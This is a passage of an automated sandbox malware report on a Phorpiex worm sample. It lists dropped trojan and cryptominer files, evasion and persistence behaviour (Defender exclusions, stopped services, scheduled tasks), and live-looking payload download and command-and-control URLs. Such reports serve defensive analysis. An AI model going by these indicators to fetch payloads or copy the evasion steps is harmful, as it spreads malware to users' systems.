C:\Windows\sysppvrdnvs.exe, PE32 22->82 dropped 130 Antivirus detection for dropped file 22->130 132 Multi AV Scanner detection for dropped file 22->132 134 Found evasive API chain (may stop execution after checking mutex) 22->134 140 5 other signatures 22->140 38 sysppvrdnvs.exe 10 41 22->38         started        136 Suspicious powershell command line found 26->136 138 Query firmware table information (likely to detect VMs) 28->138 signatures10 process11 dnsIp12 110 198.163.192.16, 40500 WINDSTREAMUS United States 38->110 112 187.133.73.5, 40500, 58708 UninetSAdeCVMX Mexico 38->112 114 34 other IPs or domains 38->114 86 C:\Users\user\AppData\Local\...\513318274.exe, PE32+ 38->86 dropped 88 C:\Users\user\AppData\Local\...\28849683.exe, PE32 38->88 dropped 90 C:\Users\user\AppData\...\2573513776.exe, PE32 38->90 dropped 92 3 other malicious files 38->92 dropped 154 Antivirus detection for dropped file 38->154 156 Multi AV Scanner detection for dropped file 38->156 158 Found evasive API chain (may stop execution after checking mutex) 38->158 160 6 other signatures 38->160 43 28849683.exe 38->43         started        48 513318274.exe 2 38->48         started        50 cmd.exe 1 38->50         started        52 3 other processes 38->52 file13 signatures14 process15 dnsIp16 118 185.215.113.84, 54299, 80 WHOLESALECONNECTIONSNL Portugal 43->118 102 C:\Users\user\AppData\...\1428024550.exe, PE32+ 43->102 dropped 104 C:\Users\user\AppData\Local\...\nxmr[1].exe, PE32+ 43->104 dropped 178 Antivirus detection for dropped file 43->178 180 Multi AV Scanner detection for dropped file 43->180 182 Machine Learning detection for dropped file 43->182 184 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->184 54 1428024550.exe 43->54         started        58 cmd.exe 1 48->58         started        60 cmd.exe 48->60         started        186 Adds a directory exclusion to Windows Defender 50->186 188 Stops critical windows services 50->188 62 powershell.exe 23 50->62         started        64 conhost.exe 50->64         started        120 91.202.233.141, 54302, 54303, 54393 M247GB Russian Federation 52->120 66 conhost.exe 52->66         started        68 sc.exe 1 52->68         started        70 sc.exe 1 52->70         started        72 3 other processes 52->72 file17 signatures18 process19 file20 84 C:\Users\user\...\winupsecvmgr.exe, PE32+ 54->84 dropped 142 Antivirus detection for dropped file 54->142 144 Multi AV Scanner detection for dropped file 54->144 146 Suspicious powershell command line found 54->146 152 2 other signatures 54->152 148 Uses schtasks.exe or at.exe to add and modify task schedules 58->148 74 conhost.exe 58->74         started        76 reg.exe 58->76         started        78 conhost.exe 60->78         started        80 schtasks.exe 60->80         started        150 Loading BitLocker PowerShell Module 62->150 signatures21 process22

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                lJ4EzPSKMj.exe71%ReversingLabsWin32.Worm.Phorpiex
                                lJ4EzPSKMj.exe100%AviraHEUR/AGEN.1315823

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\AppData\Local\Temp\28849683.exe100%AviraWORM/Phorpiex.olrti
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\AppData\Local\Temp\1428024550.exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe100%AviraHEUR/AGEN.1315882
                                C:\Windows\sysppvrdnvs.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Temp\2573513776.exe100%AviraTR/Dldr.Agent.daypt
                                C:\Users\user\AppData\Local\Temp\5232.scr100%AviraHEUR/AGEN.1315882
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\28849683.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1428024550.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\513318274.exe100%Joe Sandbox ML
                                C:\Windows\sysppvrdnvs.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\5232.scr100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe82%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Users\user\AppData\Local\Temp\1428024550.exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Users\user\AppData\Local\Temp\15714163.exe55%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\2573513776.exe58%ReversingLabsWin32.Trojan.Malgent
                                C:\Users\user\AppData\Local\Temp\28849683.exe76%ReversingLabsWin32.Worm.Phorpiex
                                C:\Users\user\AppData\Local\Temp\513318274.exe75%ReversingLabsByteCode-MSIL.Trojan.InjectorX
                                C:\Users\user\AppData\Local\Temp\5232.scr82%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                                C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys5%ReversingLabs
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Windows\sysppvrdnvs.exe82%ReversingLabsWin32.Trojan.MintZard

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://contoso.com/License0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                http://www.microsoft.c0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                twizthash.net
                                		185.215.113.66
                                		truetrue
                                  		unknown
                                  15.164.165.52.in-addr.arpa
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://185.215.113.66/tdrpl.exetrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://185.215.113.66/5;sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.215.113.66/reg.php?s=%s2573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		unknown
                                          http://185.215.113.84/nxmr.exe28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://91.202.233.141/ALLBSTATAASASDMozilla/5.0sysppvrdnvs.exe, 00000004.00000002.2916250466.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 15714163.exe, 0000001D.00000000.2014700788.0000000000012000.00000002.00000001.01000000.0000000C.sdmp, 15714163.exe, 0000001D.00000002.2065701337.0000000000012000.00000002.00000001.01000000.0000000C.sdmpfalse
                                              		unknown
                                              http://91.202.233.141/5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                http://91.202.233.141/ALLBSTATAASASD00wWP15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://185.215.113.66/1Fsysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://185.215.113.84/nxmr.exeh28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://91.202.233.141/#15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://185.215.113.84/nxmr.exeP0sysppvrdnvs.exe, 00000004.00000002.2914673309.0000000002E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/soap/envelope/sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://91.202.233.141/1sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://91.202.233.141/2sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://185.215.113.66/tdrpl.execrC:lJ4EzPSKMj.exe, 00000000.00000003.1532891625.000000000131B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://91.202.233.141/ALLBSTATAASASDX15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://185.215.113.66/2C:sysppvrdnvs.exe, 00000004.00000003.1888137491.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1888097400.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2914922304.00000000032E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://91.202.233.141/5sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://91.202.233.141/3sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://91.202.233.141/4sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://185.215.113.66/4C:sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://185.215.113.66/tdrpl.exe#lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://91.202.233.141/3Msysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://91.202.233.141/ALLBSTATAASASD_615714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://contoso.com/powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.2150868586.0000026E9006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://185.215.113.66/2Dsysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://185.215.113.66/lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmptrue
                                                                                      		unknown
                                                                                      http://91.202.233.141/ALLBSTATAASASD15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://91.202.233.141/2asysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://185.215.113.66/4ystem32sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://185.215.113.66/tdrpl.exe658-3693405117-2476756634-1003D9lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.microsoft.cpowershell.exe, 00000024.00000002.2322777022.00000289BFAC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2883930454.00000156CF2C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://91.202.233.141/TLOADEDBROMozilla/5.02573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001F.00000002.2127566085.0000026E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A76A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://91.202.233.141/ALLBSTATAASASD315714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://185.215.113.66/tdrpl.exeLMEMlJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://185.215.113.66/q9lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://185.215.113.66/tdrpl.exe;lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.2150868586.0000026E9006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://185.215.113.66/2_sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://91.202.233.141/ALLBSTATAASASD)15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://91.202.233.141/ALLBSTATAASASDui15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, powershell.exe, 0000001F.00000002.2127566085.0000026E80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://185.215.113.66/2asysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://185.215.113.66/tdrpl.exeBlJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://185.215.113.66/tdrpl.exeSSC:lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://185.215.113.66/5sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://185.215.113.84/nxmr.exe:28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://185.215.113.66/4sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1887906362.00000000032F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://185.215.113.66/3sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1887906362.00000000032F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://185.215.113.66/2sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://185.215.113.84/nxmr.exeP0A28849683.exe, 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmp, 28849683.exe, 0000001C.00000000.1927965529.0000000000412000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://185.215.113.66/2Msysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://185.215.113.66/tdrpl.exeNlJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://185.215.113.66/2Psysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://185.215.113.66/1sysppvrdnvs.exe, 00000004.00000003.1673002910.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2911602093.0000000000803000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1672852069.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://185.215.113.66/5zsysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://185.215.113.66/reg.php?s=%sMozilla/5.02573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://185.215.113.84/nxmr.exe528849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://185.215.113.66/1ssysppvrdnvs.exe, 00000004.00000003.1673002910.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://185.215.113.84/nxmr.exeystem3228849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://185.215.113.66/5C:sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://91.202.233.141/2)sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://185.215.113.84/28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://185.215.113.66/1KKC:sysppvrdnvs.exe, 00000004.00000003.1672852069.00000000032EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.2127566085.0000026E80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://xmrig.com/docs/algorithmswinupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000001F.00000002.2127566085.0000026E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A76A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://185.215.113.66/tdrp.exesysppvrdnvs.exefalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://185.215.113.66/2ssysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://91.202.233.141/ALLBSTATAASASDyi215714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://91.202.233.141/6122658-3693405117-2476756634-100315714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://185.215.113.84/nxmr.exeW28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              185.215.113.66
                                                                                                                                                                              		twizthash.netPortugal
                                                                                                                                                                              		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                              198.163.192.16
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		7029WINDSTREAMUStrue
                                                                                                                                                                              198.163.193.230
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		7029WINDSTREAMUSfalse
                                                                                                                                                                              5.76.120.41
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZfalse
                                                                                                                                                                              78.137.95.224
                                                                                                                                                                              		unknownYemen
                                                                                                                                                                              		30873PTC-YEMENNETYEfalse
                                                                                                                                                                              91.202.233.141
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		9009M247GBtrue
                                                                                                                                                                              185.131.95.169
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRfalse
                                                                                                                                                                              89.218.184.42
